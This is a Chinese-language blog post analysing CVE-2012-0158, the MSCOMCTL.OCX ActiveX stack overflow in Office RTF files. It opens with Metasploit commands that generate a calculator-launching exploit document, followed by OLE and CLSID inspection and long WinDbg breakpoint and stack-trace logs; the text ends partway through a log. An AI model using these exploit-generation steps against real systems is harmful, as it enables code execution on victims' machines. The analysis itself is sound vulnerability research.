漏洞检测

漏洞检测
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
永远的经典：CVE-2012-0158漏洞分析、利用、检测和总结
阅读量 72994 | 评论 7 稿费 400

分享到： QQ空间新浪微博微信 QQ facebook twitter
发布时间：2017-12-21 14:09:32

前段时间调试了一下CVE-2017-11882，分析过程中发现CVE-2017-11882和CVE-2012-0158很像。上周末我决定重新分析一下0158这个经典的栈溢出漏洞。由于0158是office领域的入门漏洞，所以这篇文章中我借这个漏洞来展示一下对这类office内嵌ActiveX控件漏洞的基本分析过程。

用metasploit生成样本
首先在Kali Linux下用metasploit 生成一个CVE-2012-0158弹计算器的样本，步骤如下：

msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof

msf exploit(ms12_027_mscomctl_bof) > info

Name: MS12-027 MSCOMCTL ActiveX Buffer Overflow

Module: exploit/windows/fileformat/ms12_027_mscomctl_bof

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Average

Disclosed: 2012-04-10

Provided by:

Unknown

juan vazquez

sinn3r

Available targets:

Id Name

-- ----

0 Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English

1 Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME msf.doc yes The file name.

Payload information:

Space: 900

Avoid: 1 characters

Description:

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It

uses a malicious RTF to embed the specially crafted

MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April

2012. This module targets Office 2007 and Office 2010 targets. The

DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain

proposed by Abysssec. This chain uses "msgr3en.dll", which will load

after office got load, so the malicious file must be loaded through

"File / Open" to achieve exploitation.

References:

https://cvedetails.com/cve/CVE-2012-0158/OSVDB (81125)

http://www.securityfocus.com/bid/52911

https://technet.microsoft.com/en-us/library/security/MS12-027

http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html

msf exploit(ms12_027_mscomctl_bof) > set payload windows/exec

payload => windows/exec

msf exploit(ms12_027_mscomctl_bof) > show options

Module options (exploit/windows/fileformat/ms12_027_mscomctl_bof):

Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME msf.doc yes The file name.

Payload options (windows/exec):

Name Current Setting Required Description

---- --------------- -------- -----------

CMD yes The command string to execute

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

Exploit target:

Id Name

-- ----

0 Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English

msf exploit(ms12_027_mscomctl_bof) > set CMD calc

CMD => calc

msf exploit(ms12_027_mscomctl_bof) > set target 0

target => 0

msf exploit(ms12_027_mscomctl_bof) > exploit

[*] Creating 'msf.doc' file ...

[+] msf.doc stored at /root/.msf4/local/msf.doc
将生成的文件重命名为 cve-2012-0158-msf-2007.rtf ，拖入装有office 2007的虚拟机，双击打开，可以正常弹出计算器，下面开始调试该漏洞。

静态分析
图1为生成的样本rtf文件在Notepad++中打开的视图(稍作整理)，\objocx关键字代表嵌入了一个ActiveX控件对象，\objdata后面的数据代表了控件数据，控件以ole格式存储在rtf文档中，此部分数据将会被读入winword.exe进程内存并被解析。

图1

我们用rtfobj.py工具来提取里面嵌入的ole对象，提取结果如图2所示：

图2

将提取的OLE对象用OleFileView打开，可以看到包含三个Stream：Contents, ObjInfo和OCXNAME，每个流的内容分别如图3，图4，图5所示。

图3 (Contents流内存储着比较多的数据，猜测该Stream应该代表着控件数据)

图4 (ObjInfo流内只存储着寥寥几个字节)

图5 (OCXNAME流内存储的是控件名称)

再将提取出的cve-2012-0158-msf-2007.rtf__object_000000A0.bin对象拖入010编辑器，用OLESS模板打开，定位到如下CLSID：bdd1f04b-858b-11d1-b16a-00c0f0283628，如图6所示：

图6

我们再来看一下这个CLSID对应的模块是什么(图7)，可以看到ListView控件对应的模块是MSCMOCTL.OCX，一般看到这里你就知道分析时需要在对哪个模块下加载断点了，当然，在面对一个全新样本时，直到这里我们还无法确定漏洞是如何造成的，但可以推测漏洞与MSCMOCTL.OCX模块有关。维一零在他个人博客中写0158篇的最后写道：“本文最大的漏洞在于，我分析过程的前提是我知道了漏洞的模块是ActiveX控件的解析库MSCOMCTL.DLL，假如我不知道这条信息，我又该怎么来分析这个漏洞呢？”。这个问题的答案是：找ole里面的CLSID，然后查询关联模块。这样在面对一个新的漏洞样本的时候，就有切入点了。

图7

动态分析
由前面的分析已知这个样本会弹出计算器，我们用windbg attach word进程，设置如下两个断点(图8)，断下后，看到栈回溯如图9所示，可以看到栈被破坏得很严重。初步判断这应该是一个栈溢出漏洞

图8

图9

然而我们并不能准确定位到是哪个模块出的问题，向前向后回溯栈和看寄存器(图10)也无法得到进一步的有效信息：

图10

这时我们可以装个EMET，在打开样本后，借助EMET的记录，通过在事件管理器里面定位DEP、EAF、ROP等相关记录的地址来进一步定位漏洞的触发点(如 jmp esp)。这里我决定采取另一种方式，既然这个样本要加载一个OLE对象，对OpenStream函数的调用肯定是跑不掉的，于是我在windbg里面搜寻OpenStream相关函数，结果如图11所示：

图11

ole32!CexposedDocFile::OpenStream函数成功引起了我的注意，我们来看一下微软对于OpenStream函数的定义，如图12所示；我们感兴趣的是它的第一个参数，微软对其的解释如图13所示，很明显，这个参数是一个UNICODE字符串，代表了Stream的名称。当然，考虑到this指针的传递，所以这个函数在ole32内的实际实现如图14所示，代表stream名称的是第2个参数。

图12

图13

图14

现在，我们在调试器里面设置如下断点(图15)：

图15

可以看到在打开“Contents”流后，计算器就弹出来了。而前面静态分析中看到的其他两个流并没有输出，到这里可以初步断定栈溢出位于Contents流。初步推测是MSCOMCTL.OCX模块在解析内嵌控件的contents流时出了问题。

对MSCOMCTL.OCX模块下模块加载断点：sxe ld:mscomctl，以避免打开文档中其他无关流对象时在OpenStream断下。重启windbg，在命中模块加载断点时，我们来查看一下本次调试的模块信息(图16)：

图16

接下来我们在ole32!CexposedDocFile::OpenStream函数打开“Contents”流时停下，一边在windbg里面动态调试，一边在IDA里面对每个跳转点的相关代码块进行着色，不断F10，单步步过函数，直到弹出计算器。然后重启windbg，在上次的最后下断点，F11单步进入函数，重复前面的过程。通过这种方式，几个小时后，我得到了当前漏洞触发的整个执行流(当然，一开始的记录是比较粗糙的，下图为我陆续补充对应符号和细化后的结果)，如图17所示。蓝色代表栈回溯；橙色代表每次调用CExposedStream::Read的位置，CExposedStream::Read函数后面会提到；紫色为最终的栈溢出点。

这里提一下符号的问题，维一零在他个人博客中分析0158的文章最后是给了附件的，里面有一个带符号表的MSCOMCTL模块。有兴趣的小伙伴可以去下载一下他的附件。

图17

实际调试时发现winword每次从流中读取文件都会调用CExposedStream::Read函数，我们来看一下这个函数的声明(图18)：

图18

其中第二个参数是带读入数据的缓冲区指针，第三个参数为需要读入的数据大小，最后一个参数为一个指向int型数据的指针，返回实际读的字节数。

重启windbg，在加载MSCOMCTL.OCX模块后，对CExposedStream::Read函数下如下断点并进行相应输出，结果如下(省略了一些符号的加载日志)：

0:000> bp ole32!CExposedStream::Read ".echo --------------------------------------------------------------------------------------------------------------; r $t0=poi(esp+8); r $t1=poi(esp+c); k; gu; db $t0 l$t1; .printf \"ReadLength = 0x%x\\n\", $t1; g;"

0:000> g

--------------------------------------------------------------------------------------------------------------

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MSCOMCTL.OCX -

ChildEBP RetAddr

0030a9e4 2758af07 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030aa14 2758aeda MSCOMCTL!DllGetClassObject+0x41c3

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x4196

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0031a918 65878372 wwlib!DllCanUnloadNow+0x547005

0030aa0c 21 43 34 12 08 00 00 00 !C4.....

ReadLength = 0x8

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a9e4 2758af30 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030aa14 2758aeda MSCOMCTL!DllGetClassObject+0x41ec

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x4196

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0031a918 65878372 wwlib!DllCanUnloadNow+0x547005

0030aa04 6a b0 82 2c bb 05 00 00 j..,....

ReadLength = 0x8

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a988 275b673b ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2f9f7

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0031a918 65878372 wwlib!DllCanUnloadNow+0x547005

0030a9f0 4e 08 7d eb 01 00 06 00-1c 00 00 00 00 00 00 00 N.}.............

0030aa00 00 00 00 00 00 06 00 01-56 0a 00 00 ........V...

ReadLength = 0x1c

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a988 275b679c ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fa58

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0031a918 65878372 wwlib!DllCanUnloadNow+0x547005

0030a9ac 01 ef cd ab 00 00 05 00-98 5d 65 01 07 00 00 00 .........]e.....

0030a9bc 08 00 00 80 05 00 00 80-00 00 00 00 ............

ReadLength = 0x1c

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a96c 275b6875 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a994 275b67c6 MSCOMCTL!DllGetClassObject+0x2fb31

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fa82

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0030a99c 00 00 00 00 ....

ReadLength = 0x4

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a96c 275b6875 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a994 275b67d9 MSCOMCTL!DllGetClassObject+0x2fb31

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fa95

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0030a99c 00 00 00 00 ....

ReadLength = 0x4

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a96c 275b6875 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a994 275b67ec MSCOMCTL!DllGetClassObject+0x2fb31

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2faa8

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0030a99c 00 00 00 00 ....

ReadLength = 0x4

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a95c 2758b02f ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a994 275b67fb MSCOMCTL!DllGetClassObject+0x42eb

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2fab7

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0030a980 1f de ec bd 01 00 05 00-90 17 19 00 ............

ReadLength = 0xc

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a96c 275b68e5 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a990 275b6813 MSCOMCTL!DllGetClassObject+0x2fba1

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x2facf

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

003164f4 65875347 wwlib!DllCanUnloadNow+0x54a145

0030a98c 00 00 ..

ReadLength = 0x2

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a944 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a96c 275e72d8 MSCOMCTL!DllGetClassObject+0x41a42

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xfc6

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

0030a968 08 00 00 00 ....

ReadLength = 0x4

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a944 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a96c 275e72d8 MSCOMCTL!DllGetClassObject+0x41a74

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xfc6

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

05e0efb8 49 74 6d 73 64 00 00 00 Itmsd...

ReadLength = 0x8

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a944 275c87ed ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a96c 275e72d8 MSCOMCTL!DllGetClassObject+0x41aa9

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xfc6

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

ReadLength = 0x0

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a944 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a96c 275e7306 MSCOMCTL!DllGetClassObject+0x41a42

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xff4

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

0030a968 02 00 00 00 ....

ReadLength = 0x4

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a944 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a96c 275e7306 MSCOMCTL!DllGetClassObject+0x41a74

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xff4

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

05e0efb8 01 00 ..

ReadLength = 0x2

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a944 275c87ed ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a96c 275e7306 MSCOMCTL!DllGetClassObject+0x41aa9

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0xff4

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

